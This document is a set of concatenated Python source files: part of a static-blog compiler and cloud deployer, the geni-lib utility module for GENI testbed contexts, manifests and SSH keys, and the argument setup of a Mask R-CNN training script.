with open(os.path.join(build_resources_dir, "img", filename), "wb") as published:
cnsl.success("Copying image file: {}".format(filename))
published.write(file.read())
def compile():
"""
Compile the blog, outputting the result into /site.
"""
cnsl.ok("Compiling blog")
try:
shutil.rmtree(build_dir)
except:
pass
os.mkdir(build_dir)
os.mkdir(build_posts_dir)
os.mkdir(build_resources_dir)
os.mkdir(os.path.join(build_resources_dir, "css"))
os.mkdir(os.path.join(build_resources_dir, "js"))
os.mkdir(os.path.join(build_resources_dir, "img"))
templates = {}
for filename in os.listdir(os.path.join(blog_root, "templates")):
split_filename = os.path.splitext(filename)
with open(os.path.join(blog_root, "templates", filename)) as template_file:
cnsl.ok("Loading template {}".format(filename))
templates[split_filename[0]] = template_file.read()
if "base" in templates and "post" in templates:
cnsl.success("All required templates found")
else:
cnsl.error("Missing templates")
return
# Compile and minify resources
resources = {
"js": [],
"css": []
}
for root, dirs, files in os.walk(resources_dir):
for filename in files:
split_filename = os.path.splitext(filename)
ext = split_filename[1].lower()
if len(split_filename) == 2:
if ext[1:] in ["jpg", "jpeg", "png", "gif"]:
with open(os.path.join(root, filename), "rb") as resource_file:
move_image(resource_file, filename)
elif ext == ".css":
with open(os.path.join(root, filename), "r") as resource_file:
resources["css"].append(
move_resource(resource_file, filename, "css", compress))
else:
with open(os.path.join(root, filename)) as resource_file:
if ext == ".js":
resources["js"].append(
move_resource(resource_file, filename, "js", uglipyjs.compile))
else:
cnsl.warn("Don't know what to do with file {}".format(filename))
# Generate style resources
style_headers = ''.join(['<link href="/resources/css/{}" rel="stylesheet">'.format(name)
for name in resources["css"]])
# Generate script resources
script_headers = ''.join(['<script src="/resources/js/{}"></script>'.format(name)
for name in resources["js"]])
# Update base template
templates["base"] = templates["base"].replace(
"{{styles}}", style_headers).replace(
"{{scripts}}", script_headers).replace(
"{{title}}", config["blog-title"]).replace(
"{{subtitle}}", config["blog-subtitle"])
# Compile posts and pages
pages = list(load_posts(pages_dir, mode="page"))
posts = list(load_posts(posts_dir, mode="post"))
# update pages links on base template
pages_links = ''.join(['<li class="page-link"><a class="pure-button" href="{}">{}</a></li>'
.format(page["url"], page["post-title"]) for page in pages])
templates["base"] = templates["base"].replace("{{pages}}", pages_links)
# write out pages files
write_posts(build_dir, pages, templates)
write_posts(build_posts_dir, posts, templates)
# Make a list of recent posts
posts.sort(key=lambda x: x["date"], reverse=True)
cs = list(chunks(posts, 10))
i = 1
for chunk in cs:
posts_chunk = ''.join(
[render_post(templates["post"], post) for post in chunk])
# Write out index file
if i == 1:
filename = "index.html"
else:
filename = os.path.join(str(i), "index.html")
os.makedirs(os.path.join(build_dir, str(i)))
with open(os.path.join(build_dir, filename), "w") as index_file:
index_file.write(templates["base"]
.replace("{{posts}}", posts_chunk)
.replace("{{pagination}}", render_pages(len(cs), i)))
cnsl.success("Wrote index file")
i += 1
class ReloadHandler(FileSystemEventHandler):
def on_modified(self, event):
split_filename = os.path.splitext(event.src_path)
        # ignore changes in the compiled output directory ("site") so a recompile does not retrigger itself
        if not event.src_path.startswith("./site/") \
                and len(split_filename) == 2 \
                and split_filename[1][1:] in ["html", "css", "js", "md"]:
            cnsl.warn(
                "Source file {} changed, recompiling...\n".format(event.src_path))
            try:
                compile()
            except Exception as e:
                cnsl.error("Something went wrong trying to compile: {}".format(e))
else:
cnsl.warn("Ignoring change in file {}".format(event.src_path))
class SiteHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def translate_path(self, path):
""" This is an old-style class, so can't super :-( """
path = posixpath.normpath(urllib.parse.unquote(path))
words = path.split('/')
words = [_f for _f in words if _f]
path = "site"
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
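        # Example (not part of the original source): a request for "/posts/hello-world/" is
        # translated to the relative path "site/posts/hello-world", so the preview server always
        # serves the compiled output in site/ rather than the project root.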
def watch():
"""
Recompile the blog any time a file changes.
"""
compile()
cnsl.ok("Watching for file changes")
observer = Observer()
observer.schedule(ReloadHandler(), ".", recursive=True)
observer.start()
port = config.get("port", 8000)
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer(("", port), SiteHTTPRequestHandler)
    server_thread = threading.Thread(target=httpd.serve_forever)  # renamed to avoid shadowing the http module
cnsl.ok("Starting webserver on port {}".format(port))
    server_thread.start()
webbrowser.open("http://localhost:{}/".format(port))
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
httpd.shutdown()
cnsl.ok("Stopped webserver on port {}".format(port))
cnsl.ok("Stopped watching for file changes")
        server_thread.join()
observer.join()
def deploy():
"""
Deploy your site to a cloud service.
You must have specified a service provider, container name,
    and access credentials in config.yml.
"""
compile()
try:
service = config["deploy"]["service"]
except:
cnsl.error("You must specify a service to deploy to in config.yml")
return
try:
CloudFiles = get_driver(getattr(Provider, service))
except:
cnsl.error(
"The storage provider config is not valid. The available providers are as follows:")
cnsl.error(
', '.join([name for name in list(vars(Provider).keys()) if name[:2] != "__"]))
return
try:
if "aws-region" in config["deploy"]:
cnsl.ok("Connecting to region {}".format(config["deploy"]["aws-region"]))
driver = CloudFiles(
config["deploy"]["access-key"], config["deploy"]["secret-key"], region=config["deploy"]["aws-region"])
else:
driver = CloudFiles(
config["deploy"]["access-key"], config["deploy"]["secret-key"])
except Exception as e:
cnsl.error("Could not connect to storage service because: {}".format(e))
return
try:
container = driver.get_container(
container_name=config["deploy"]["container-name"])
cnsl.success("Loaded container {} from {}".format(
container.name, container.driver.name))
    except ContainerDoesNotExistError:
        container_name = config["deploy"]["container-name"]
        cnsl.warn(
            "Could not load container {}, trying to create it".format(container_name))
        try:
            container = driver.create_container(container_name=container_name)
cnsl.success("Created container {}".format(container.name))
except Exception as e:
cnsl.error("Could not create bucket because: {}".format(e))
return
except Exception as e:
cnsl.error("Could not load container {} because: {}".format(
config["deploy"]["container-name"], e))
return
# These operations are supported by some providers, so try each in turn
try:
driver.ex_enable_static_website(container=container)
cnsl.success("Enabled static website hosting")
except:
cnsl.warn(
"Could not enable static website hosting, you may have to do this manually")
try:
driver.enable_container_cdn(container=container)
cnsl.success("Enabled cdn")
except:
cnsl.warn("Could not enable cdn, you may have to do this manually")
# TODO driver.ex_set_error_page(container=container, file_name='error.html')
for root, dirs, files in os.walk(build_dir):
for filename in files:
full_filename = os.path.join(root, filename)
# Remove deploy directory prefix
full_path = os.path.join(*full_filename.split(os.sep)[1:])
if "S3" in container.driver.name:
extra = {"acl": "public-read"}
else:
# TODO test with all other services
extra = {}
try:
driver.upload_object(
file_path=full_filename,
container=container,
extra=extra,
object_name=full_path)
cnsl.success("Uploaded " + full_path)
except Exception as e:
cnsl.error("Could not upload {}, because: {}".format(full_path, e))
cnsl.success("Site successfully uploaded to container {} on {}".format(
container.name, container.driver.name))
try:
cnsl.ok('All done you can view the website at: ' +
driver.get_container_cdn_url(container=container))
except:
pass
def setup():
"""
Setup your config.yml file interactively.
"""
if os.path.exists('config.yml'):
cnsl.warn("Setting up blog, but config file already exists")
cnsl.warn("Existing config will be overwritten, or ctrl+c to exit")
title = input(
"\nPlease enter a title for your blog (you can change this later): \n")
subtitle = input("\nPlease enter a subtitle for your blog: \n")
with open('config.sample.yml') as sample_file:
sample = sample_file.read()
modified = ""
for line in sample.split("\n"):
if line.startswith("blog-title"):
modified += 'blog-title: "{}"'.format(
title.replace('\\', "\\\\").replace('"', '\\"'))
elif line.startswith("blog-subtitle"):
modified += 'blog-subtitle: "{}"'.format(
subtitle.replace('\\', "\\\\").replace('"', '\\"'))
else:
modified += line
modified += "\n"
with open('config.yml', 'w') as config_file:
config_file.write(modified)
cnsl.success("Config file written")
cnsl.ok("Welcome to Mirage. Write posts as markdown files in /posts.")
cnsl.ok("Run ./mirage compile to compile your blog.")
cnsl.ok("Run ./mirage help for more information.")
# CLI
parser = argh.ArghParser()
parser.add_commands([compile, watch, deploy, setup])
# parser.set_default_command(compile)
if __name__ == '__main__':
cnsl.header()
parser.dispatch()
|
util.py
|
# Copyright (c) 2014-2018 Barnstormer Softworks, Ltd.
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, print_function
import datetime
import json
import multiprocessing as MP
import os
import os.path
import shutil
import subprocess
import tempfile
import time
import traceback as tb
import zipfile
import six
from .aggregate.apis import ListResourcesError, DeleteSliverError
def _getdefault (obj, attr, default):
  # obj is a dict parsed from JSON, so check key membership (hasattr() never sees JSON keys)
  if attr in obj:
    return obj[attr]
  return default
def checkavailrawpc (context, am):
"""Returns a list of node objects representing available raw PCs at the
given aggregate."""
avail = []
ad = am.listresources(context)
for node in ad.nodes:
if node.exclusive and node.available:
if "raw-pc" in node.sliver_types:
avail.append(node)
return avail
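# Usage sketch (not part of the original source), assuming `context` and `am` are an already
# loaded geni context and aggregate object:
#   nodes = checkavailrawpc(context, am)
#   print("%d raw PCs currently available" % len(nodes))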
def _corelogininfo (manifest):
from .rspec.vtsmanifest import Manifest as VTSM
from .rspec.pgmanifest import Manifest as PGM
linfo = []
if isinstance(manifest, PGM):
for node in manifest.nodes:
linfo.extend([(node.client_id, x.username, x.hostname, x.port) for x in node.logins])
elif isinstance(manifest, VTSM):
for container in manifest.containers:
linfo.extend([(container.client_id, x.username, x.hostname, x.port) for x in container.logins])
return linfo
def printlogininfo (context = None, am = None, slice = None, manifest = None):
"""Prints out host login info in the format:
::
[client_id][username] hostname:port
If a manifest object is provided the information will be mined from this data,
otherwise you must supply a context, slice, and am and a manifest will be
requested from the given aggregate."""
if not manifest:
manifest = am.listresources(context, slice)
info = _corelogininfo(manifest)
for line in info:
print("[%s][%s] %s: %d" % (line[0], line[1], line[2], line[3]))
# You can't put very much information in a queue before you hang your OS
# trying to write to the pipe, so we only write the paths and then load
# them again on the backside
def _mp_get_manifest (context, site, slc, q):
try:
# Don't use geni.tempfile here - we don't want them deleted when the child process ends
# TODO: tempfiles should get deleted when the parent process picks them back up
mf = site.listresources(context, slc)
tf = tempfile.NamedTemporaryFile(delete=False)
tf.write(mf.text)
path = tf.name
tf.close()
q.put((site.name, slc, path))
except ListResourcesError:
q.put((site.name, slc, None))
except Exception:
tb.print_exc()
q.put((site.name, slc, None))
def getManifests (context, ams, slices):
"""Returns a two-level dictionary of the form:
::
{slice_name : { site_object : manifest_object, ... }, ...}
Containing the manifests for all provided slices at all the provided
sites. Requests are made in parallel and the function blocks until the
slowest site returns (or times out)."""
sitemap = {}
for am in ams:
sitemap[am.name] = am
q = MP.Queue()
for site in ams:
for slc in slices:
p = MP.Process(target=_mp_get_manifest, args=(context, site, slc, q))
p.start()
while MP.active_children():
time.sleep(0.5)
d = {}
while not q.empty():
(site,slc,mpath) = q.get()
if mpath:
am = sitemap[site]
data = open(mpath).read()
mf = am.amtype.parseManifest(data)
d.setdefault(slc, {})[sitemap[site]] = mf
return d
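# Usage sketch (not part of the original source), with "myslice" as a hypothetical slice name:
#   manifests = getManifests(context, ams, ["myslice"])
#   for slc, site_map in manifests.items():
#     for site, manifest in site_map.items():
#       print("%s @ %s" % (slc, site.name))
# Sites whose listresources call failed are simply absent from the inner dictionary.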
def _mp_get_advertisement (context, site, q):
try:
ad = site.listresources(context)
q.put((site.name, ad))
except Exception:
q.put((site.name, None))
def getAdvertisements (context, ams):
"""Returns a dictionary of the form:
::
{ site_object : advertisement_object, ...}
Containing the advertisements for all the requested aggregates. Requests
are made in parallel and the function blocks until the slowest site
returns (or times out).
.. warning::
Particularly large advertisements may break the shared memory queue
used by this function."""
q = MP.Queue()
for site in ams:
p = MP.Process(target=_mp_get_advertisement, args=(context, site, q))
p.start()
while MP.active_children():
time.sleep(0.5)
d = {}
while not q.empty():
(site,ad) = q.get()
d[site] = ad
return d
def deleteSliverExists(am, context, slice):
"""Attempts to delete all slivers for the given slice at the given AM, suppressing all returned errors."""
try:
am.deletesliver(context, slice)
except DeleteSliverError:
pass
def _buildaddot(ad, drop_nodes = None):
"""Constructs a dotfile of a topology described by an advertisement rspec. Only works on very basic GENIv3 advertisements,
and probably has lots of broken edge cases."""
# pylint: disable=too-many-branches
if not drop_nodes:
drop_nodes = []
dot_data = []
dda = dot_data.append # Save a lot of typing
dda("graph {")
for node in ad.nodes:
if node.name in drop_nodes:
continue
if node.available:
dda("\"%s\"" % (node.name))
else:
dda("\"%s\" [style=dashed]" % (node.name))
for link in ad.links:
    if len(link.interface_refs) != 2:
      print("Link without exactly 2 interfaces:")
print(link.text)
name_1 = link.interface_refs[0].split(":")[-2].split("+")[-1]
name_2 = link.interface_refs[1].split(":")[-2].split("+")[-1]
if name_1 in drop_nodes or name_2 in drop_nodes:
continue
dda("\"%s\" -- \"%s\"" % (name_1, name_2))
dda("}")
return "\n".join(dot_data)
def builddot (manifests):
"""Constructs a dotfile of the topology described in the passed in manifest list and returns it as a string."""
# pylint: disable=too-many-branches
from .rspec import vtsmanifest as VTSM
from .rspec.pgmanifest import Manifest as PGM
dot_data = []
dda = dot_data.append # Save a lot of typing
dda("digraph {")
for manifest in manifests:
if isinstance(manifest, PGM):
intf_map = {}
for node in manifest.nodes:
dda("\"%s\" [label = \"%s\"]" % (node.sliver_id, node.name))
for interface in node.interfaces:
intf_map[interface.sliver_id] = (node, interface)
for link in manifest.links:
label = link.client_id
name = link.client_id
if link.vlan:
label = "VLAN\n%s" % (link.vlan)
name = link.vlan
dda("\"%s\" [label=\"%s\",shape=doublecircle,fontsize=11.0]" % (name, label))
for ref in link.interface_refs:
dda("\"%s\" -> \"%s\" [taillabel=\"%s\"]" % (
intf_map[ref][0].sliver_id, name,
intf_map[ref][1].component_id.split(":")[-1]))
dda("\"%s\" -> \"%s\"" % (name, intf_map[ref][0].sliver_id))
elif isinstance(manifest, VTSM.Manifest):
for dp in manifest.datapaths:
dda("\"%s\" [shape=rectangle];" % (dp.client_id))
for ctr in manifest.containers:
dda("\"%s\" [shape=oval];" % (ctr.client_id))
dda("subgraph cluster_vf {")
dda("label = \"SSL VPNs\";")
dda("rank = same;")
for vf in manifest.functions:
if isinstance(vf, VTSM.SSLVPNFunction):
dda("\"%s\" [label=\"%s\",shape=hexagon];" % (vf.client_id, vf.note))
dda("}")
# TODO: We need to actually go through datapaths and such, but we can approximate for now
for port in manifest.ports:
if isinstance(port, VTSM.GREPort):
pass
elif isinstance(port, VTSM.PGLocalPort):
dda("\"%s\" -> \"%s\" [taillabel=\"%s\"]" % (port.dpname, port.shared_vlan,
port.name))
dda("\"%s\" -> \"%s\"" % (port.shared_vlan, port.dpname))
elif isinstance(port, VTSM.InternalPort):
dp = manifest.findTarget(port.dpname)
if dp.mirror == port.client_id:
continue # The other side will handle it, oddly
# TODO: Handle mirroring into another datapath
dda("\"%s\" -> \"%s\" [taillabel=\"%s\"]" % (port.dpname, port.remote_dpname,
port.name))
elif isinstance(port, VTSM.InternalContainerPort):
# Check to see if the other side is a mirror into us
dp = manifest.findTarget(port.remote_dpname)
if isinstance(dp, VTSM.ManifestDatapath):
if port.remote_client_id == dp.mirror:
remote_port_name = port.remote_client_id.split(":")[-1]
dda("\"%s\" -> \"%s\" [headlabel=\"%s\",taillabel=\"%s\",style=dashed]" % (
port.remote_dpname, port.dpname, port.name, remote_port_name))
continue
# No mirror, draw as normal
dda("\"%s\" -> \"%s\" [taillabel=\"%s\"]" % (port.dpname, port.remote_dpname,
port.name))
elif isinstance(port, VTSM.VFPort):
dda("\"%s\" -> \"%s\"" % (port.dpname, port.remote_client_id))
dda("\"%s\" -> \"%s\"" % (port.remote_client_id, port.dpname))
elif isinstance(port, VTSM.GenericPort):
pass
else:
continue ### TODO: Unsupported Port Type
dda("}")
return "\n".join(dot_data)
class APIEncoder(json.JSONEncoder):
def default (self, obj): # pylint: disable=E0202
if hasattr(obj, "__json__"):
return obj.__json__()
elif isinstance(obj, set):
return list(obj)
return json.JSONEncoder.default(self, obj)
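# Usage sketch (not part of the original source): APIEncoder lets any object that implements a
# __json__() method (and plain sets) be passed straight to json.dumps, e.g.
#   json.dumps({"values": {1, 2, 3}, "spec": some_amspec}, cls=APIEncoder)
# where some_amspec is any object with a __json__() method; this is roughly how saveAggregates()
# below persists aggregate specs, and sets come out as JSON lists.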
def loadAggregates (path = None):
from .aggregate.spec import AMSpec
from . import _coreutil as GCU
if not path:
path = GCU.getDefaultAggregatePath()
ammap = {}
try:
obj = json.loads(open(path, "r").read())
for aminfo in obj["specs"]:
ams = AMSpec._jconstruct(aminfo)
am = ams.build()
if am:
ammap[am.name] = am
except IOError:
pass
return ammap
def updateAggregates (context, ammap):
from .aggregate.core import loadFromRegistry
new_map = loadFromRegistry(context)
for k,v in new_map.items():
if k not in ammap:
ammap[k] = v
saveAggregates(ammap)
def saveAggregates (ammap, path = None):
from . import _coreutil as GCU
if not path:
path = GCU.getDefaultAggregatePath()
obj = {"specs" : [x._amspec for x in ammap.values() if x._amspec]}
with open(path, "w+") as f:
data = json.dumps(obj, cls=APIEncoder)
f.write(data)
def loadContext (path = None, key_passphrase = None):
import geni._coreutil as GCU
from geni.aggregate import FrameworkRegistry
from geni.aggregate.context import Context
from geni.aggregate.user import User
if path is None:
path = GCU.getDefaultContextPath()
else:
path = os.path.expanduser(path)
obj = json.load(open(path, "r"))
version = _getdefault(obj, "version", 1)
if key_passphrase is True:
import getpass
key_passphrase = getpass.getpass("Private key passphrase: ")
if version == 1:
cf = FrameworkRegistry.get(obj["framework"])()
cf.cert = obj["cert-path"]
if key_passphrase:
if six.PY3:
key_passphrase = bytes(key_passphrase, "utf-8")
cf.setKey(obj["key-path"], key_passphrase)
else:
cf.key = obj["key-path"]
user = User()
user.name = obj["user-name"]
user.urn = obj["user-urn"]
user.addKey(obj["user-pubkeypath"])
context = Context()
context.addUser(user)
context.cf = cf
context.project = obj["project"]
context.path = path
elif version == 2:
context = Context()
fobj = obj["framework-info"]
cf = FrameworkRegistry.get(fobj["type"])()
cf.cert = fobj["cert-path"]
if key_passphrase:
cf.setKey(fobj["key-path"], key_passphrase)
else:
cf.key = fobj["key-path"]
context.cf = cf
context.project = fobj["project"]
context.path = path
ulist = obj["users"]
for uobj in ulist:
user = User()
user.name = uobj["username"]
user.urn = _getdefault(uobj, "urn", None)
klist = uobj["keys"]
for keypath in klist:
user.addKey(keypath)
context.addUser(user)
from cryptography import x509
from cryptography.hazmat.backends import default_backend
cert = x509.load_pem_x509_certificate(open(context._cf.cert, "rb").read(), default_backend())
if cert.not_valid_after < datetime.datetime.now():
print("***WARNING*** Client SSL certificate supplied in this context is expired")
return context
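# Usage sketch (not part of the original source): a typical script begins with
#   context = loadContext()          # reads the default context.json under the .bssw directory
#   ads = getAdvertisements(context, list(loadAggregates().values()))
# Pass key_passphrase=True to be prompted interactively for an encrypted private key.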
def hasDataContext ():
import geni._coreutil as GCU
path = GCU.getDefaultContextPath()
return os.path.exists(path)
class MissingPublicKeyError(Exception):
def __str__ (self):
return "Your bundle does not appear to contain an SSH public key. You must supply a path to one."
class PathNotFoundError(Exception):
def __init__ (self, path):
super(PathNotFoundError, self).__init__()
self._path = path
def __str__ (self):
return "The path %s does not exist." % (self._path)
def _find_ssh_keygen ():
PATHS = ["/usr/bin/ssh-keygen", "/bin/ssh-keygen", "/usr/sbin/ssh-keygen", "/sbin/ssh-keygen"]
for path in PATHS:
if os.path.exists(path):
return path
MAKE_KEYPAIR = (-1, 1)
def buildContextFromBundle (bundle_path, pubkey_path = None, cert_pkey_path = None):
import geni._coreutil as GCU
HOME = os.path.expanduser("~")
# Create the .bssw directories if they don't exist
DEF_DIR = GCU.getDefaultDir()
zf = zipfile.ZipFile(os.path.expanduser(bundle_path))
zip_pubkey_path = None
if pubkey_path is None or pubkey_path == MAKE_KEYPAIR:
# search for pubkey-like file in zip
for fname in zf.namelist():
if fname.startswith("ssh/public/") and fname.endswith(".pub"):
zip_pubkey_path = fname
break
if not zip_pubkey_path and pubkey_path != MAKE_KEYPAIR:
raise MissingPublicKeyError()
# Get URN/Project/username from omni_config
urn = None
project = None
oc = zf.open("omni_config")
for l in oc.readlines():
if l.startswith("urn"):
urn = l.split("=")[1].strip()
elif l.startswith("default_project"):
project = l.split("=")[1].strip()
uname = urn.rsplit("+")[-1]
# Create .ssh if it doesn't exist
try:
os.makedirs("%s/.ssh" % (HOME), 0o775)
except OSError:
pass
# If a pubkey wasn't supplied on the command line, we may need to install both keys from the bundle
# This will catch if creation was requested but failed
pkpath = pubkey_path
if not pkpath or pkpath == MAKE_KEYPAIR:
found_private = False
if "ssh/private/id_geni_ssh_rsa" in zf.namelist():
found_private = True
if not os.path.exists("%s/.ssh/id_geni_ssh_rsa" % (HOME)):
# If your umask isn't already 0, we can't safely create this file with the right permissions
with os.fdopen(os.open("%s/.ssh/id_geni_ssh_rsa" % (HOME), os.O_WRONLY | os.O_CREAT, 0o600), "w") as tf:
tf.write(zf.open("ssh/private/id_geni_ssh_rsa").read())
if zip_pubkey_path:
pkpath = "%s/.ssh/%s" % (HOME, zip_pubkey_path[len('ssh/public/'):])
if not os.path.exists(pkpath):
with open(pkpath, "w+") as tf:
tf.write(zf.open(zip_pubkey_path).read())
# If we don't find a proper keypair, we'll make you one if you asked for it
# This preserves your old pubkey if it existed in case you want to use that later
if not found_private and pubkey_path == MAKE_KEYPAIR:
keygen = _find_ssh_keygen()
subprocess.call("%s -t rsa -b 2048 -f ~/.ssh/genilib_rsa -N ''" % (keygen), shell = True)
pkpath = os.path.expanduser("~/.ssh/genilib_rsa.pub")
else:
pkpath = os.path.expanduser(pubkey_path)
if not os.path.exists(pkpath):
raise PathNotFoundError(pkpath)
# We write the pem into 'private' space
zf.extract("geni_cert.pem", DEF_DIR)
if cert_pkey_path is None:
ckpath = "%s/geni_cert.pem" % (DEF_DIR)
else:
# Use user-provided key path instead of key inside .pem
ckpath = os.path.expanduser(cert_pkey_path)
if not os.path.exists(ckpath):
raise PathNotFoundError(ckpath)
cdata = {}
cdata["framework"] = "portal"
cdata["cert-path"] = "%s/geni_cert.pem" % (DEF_DIR)
cdata["key-path"] = ckpath
cdata["user-name"] = uname
cdata["user-urn"] = urn
cdata["user-pubkeypath"] = pkpath
cdata["project"] = project
json.dump(cdata, open("%s/context.json" % (DEF_DIR), "w+"))
def _buildContext (framework, cert_path, key_path, username, user_urn, pubkey_path, project, path=None):
import geni._coreutil as GCU
# Create the .bssw directories if they don't exist
DEF_DIR = GCU.getDefaultDir()
new_cert_path = "%s/%s" % (DEF_DIR, os.path.basename(cert_path))
shutil.copyfile(cert_path, new_cert_path)
if key_path != cert_path:
new_key_path = "%s/%s" % (DEF_DIR, os.path.basename(key_path))
shutil.copyfile(key_path, new_key_path)
else:
new_key_path = new_cert_path
if not path:
path = "%s/context.json" % (DEF_DIR)
cdata = {}
cdata["framework"] = framework
cdata["cert-path"] = new_cert_path
cdata["key-path"] = new_key_path
cdata["user-name"] = username
cdata["user-urn"] = user_urn
cdata["user-pubkeypath"] = pubkey_path
cdata["project"] = project
json.dump(cdata, open(path, "w+"))
|
main.py
|
# coding=utf-8
# main script for training and testing mask rcnn on MSCOCO dataset
# multi gpu version
import sys, os, argparse
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # so we won't get the pool allocator info spam
# solve the issue of a bug in while loop, when you import the graph in multi-gpu, prefix is not added in while loop op # https://github.com/tensorflow/tensorflow/issues/26526
os.environ['TF_ENABLE_CONTROL_FLOW_V2'] = '1'
# remove all the annoying warnings from tf v1.10 to v1.13
import logging
logging.getLogger('tensorflow').disabled = True
import numpy as np
import cv2
from models import get_model
from trainer import Trainer
from tester import Tester
import math, time, json, random, operator
import pickle
import tensorflow as tf
import pycocotools.mask as cocomask
from tqdm import tqdm
from models import pack, initialize
from nn import resizeImage, fill_full_mask
from utils import evalcoco, match_detection, computeAP, computeAR, computeAR_2, grouper, gather_dt, gather_gt, match_dt_gt, gather_act_singles, aggregate_eval, weighted_average
from utils import Dataset, Summary, nms_wrapper, FIFO_ME
from pycocotools.coco import COCO
# for using a COCO model to finetuning with DIVA data.
from class_ids import (
    targetClass1to1, targetClass2id, targetAct2id, targetAct2id_wide, targetAct2id_tall,
    targetSingleAct2id, targetPairAct2id, targetClass2id_tall, targetClass2id_wide,
    targetClass2id_wide_v2, targetClass2id_mergeProp, targetClass2id_new,
    targetClass2id_new_nopo, targetAct2id_bupt, bupt_act_mapping, targetAct2id_meva,
    meva_act_mapping, coco_obj_class_to_id, coco_obj_id_to_class, coco_obj_to_actev_obj)
targetid2class = {targetClass2id[one]:one for one in targetClass2id}
targetactid2class = {targetAct2id[one]:one for one in targetAct2id}
targetsingleactid2class = {targetSingleAct2id[one]:one for one in targetSingleAct2id}
eval_target = {
"Vehicle":["car","motorcycle","bus","truck","vehicle"],
"Person":"person",
}
eval_best = "Person" # not used anymore, we use average as the best metric
def get_args():
global targetClass2id, targetid2class
parser = argparse.ArgumentParser()
parser.add_argument("datajson")
parser.add_argument("imgpath")
parser.add_argument("--log_time_and_gpu", action="store_true")
parser.add_argument("--outbasepath",type=str,default=None,help="full path will be outbasepath/modelname/runId")
parser.add_argument("--actoutbasepath",type=str,default=None,help="for activity box forward only")
parser.add_argument("--train_skip",type=int,default=1,help="when load diva train set, skip how many.")
parser.add_argument("--train_skip_offset",type=int,default=0,help="when load diva train set, offset before skip")
parser.add_argument("--val_skip",type=int,default=1,help="when load diva val set, skip how many.")
parser.add_argument("--val_skip_offset",type=int,default=0,help="when load diva train set, offset before skip")
parser.add_argument("--exit_after_val",action="store_true")
parser.add_argument("--forward_skip",type=int,default=1,help="forward, skip how many.")
parser.add_argument("--use_two_level_outpath", action="store_true")
parser.add_argument("--start_from",type=int,default=0,help="forward, start from which batch")
parser.add_argument("--modelname",type=str,default=None)
parser.add_argument("--num_class",type=int,default=81,help="num catagory + 1 background")
# ---- for training, show losses' moving average
parser.add_argument("--show_loss_period", type=int, default=1000)
parser.add_argument("--loss_me_step", type=int, default=100, help="moving average queue size")
# ------ extract fpn feature of the whole image
parser.add_argument("--extract_feat",action="store_true")
parser.add_argument("--feat_path",default=None)
parser.add_argument("--just_feat",action="store_true",help="only extract full image feature no bounding box")
# ------ do object detection and extract the fpn feature for each *final* boxes
parser.add_argument("--get_box_feat",action="store_true")
parser.add_argument("--box_feat_path",default=None)
# ---different from above, only feat no object detection
parser.add_argument("--videolst",default=None)
parser.add_argument("--skip",action="store_true",help="skip existing npy")
parser.add_argument("--tococo",action="store_true",help="for training in diva using coco model, map diva class1to1 to coco")
parser.add_argument("--diva_class",action="store_true",help="the last layer is 16 (full) class output as the diva object classes")
parser.add_argument("--diva_class2",action="store_true",help="the last layer is new classes with person_object boxes")
parser.add_argument("--diva_class3",action="store_true",help="the last layer is new classes without person_object boxes")
parser.add_argument("--is_coco_model",action="store_true",help="")
parser.add_argument("--merge_prop",action="store_true",help="use annotation that merged prop and Push_Pulled_Object and train")
parser.add_argument("--use_bg_score",action="store_true")
# ------------activity detection
parser.add_argument("--act_as_obj",action="store_true",help="activity box as obj box")
parser.add_argument("--add_act",action="store_true",help="add activitiy model")
# 07/2019
parser.add_argument("--bupt_exp", action="store_true", help="bupt activity box exp")
parser.add_argument("--meva_exp", action="store_true", help="meva activity box exp")
parser.add_argument("--check_img_exist", action="store_true", help="check image exists when load data")
parser.add_argument("--fix_obj_model",action="store_true",help="fix the object detection part including rpn")
# v1:
parser.add_argument("--num_act_class",type=int,default=36,help="num catagory + 1 background")
parser.add_argument("--fastrcnn_act_fg_ratio",default=0.25,type=float)
parser.add_argument("--act_relation_nn",action="store_true",help="add relation link in activity fastrnn head")
parser.add_argument("--act_loss_weight",default=1.0,type=float)
# ----- activity detection version 2
parser.add_argument("--act_v2",action="store_true")
parser.add_argument("--act_single_topk",type=int,default=5,help="each box topk classes are output")
parser.add_argument("--num_act_single_class",default=36,type=int)
parser.add_argument("--num_act_pair_class",default=21,type=int)
# ---------------------------------------------
parser.add_argument("--debug",action="store_true",help="load fewer image for debug in training")
parser.add_argument("--runId",type=int,default=1)
# forward mode: imgpath is the list of images
# will output result to outbasepath
  # forward mode still needs a coco validation json to get the category names
parser.add_argument("--mode",type=str,default="forward",help="train | test | forward | boxfeat | givenbox")
parser.add_argument("--avg_feat",action="store_true",help="for boxfeat mode, output 7x7x2048 or just 2048 for each box")
parser.add_argument("--boxjsonpath",default=None,help="json contain a dict for all the boxes, imageId -> boxes")
parser.add_argument("--boxfeatpath",default=None,help="where to save the box feat path, will be a npy for each image")
parser.add_argument("--boxclass",action="store_true",help="do box classification as well")
parser.add_argument("--resnet152",action="store_true",help="")
parser.add_argument("--resnet50",action="store_true",help="")
parser.add_argument("--resnet34",action="store_true",help="")
parser.add_argument("--resnet18",action="store_true",help="")
parser.add_argument("--use_se",action="store_true",help="use squeeze and excitation in backbone")
parser.add_argument("--use_resnext", action="store_true")
parser.add_argument("--is_fpn",action="store_true")
parser.add_argument("--use_gn",action="store_true", help="whether to use group normalization")
parser.add_argument("--ignore_gn_vars",action="store_true", help="add gn to previous model, will ignore loading the gn var first")
parser.add_argument("--use_conv_frcnn_head", action="store_true",help="use conv in fastrcnn head")
parser.add_argument("--use_att_frcnn_head", action="store_true",help="use attention to sum [K, 7, 7, C] feature into [K, C]")
parser.add_argument("--use_frcnn_class_agnostic", action="store_true", help="use class agnostic fc head")
parser.add_argument("--conv_frcnn_head_dim", default=256, type=int)
parser.add_argument("--get_rpn_out", action="store_true")
parser.add_argument("--rpn_out_path",default=None)
parser.add_argument("--use_cpu_nms",action="store_true")
parser.add_argument("--no_nms", action="store_true", help="not using nms in the end, save all pre_nms_topk boxes;")
parser.add_argument("--save_all_box",action="store_true", help="for DCR experiment, save all boxes and scores in npz file")
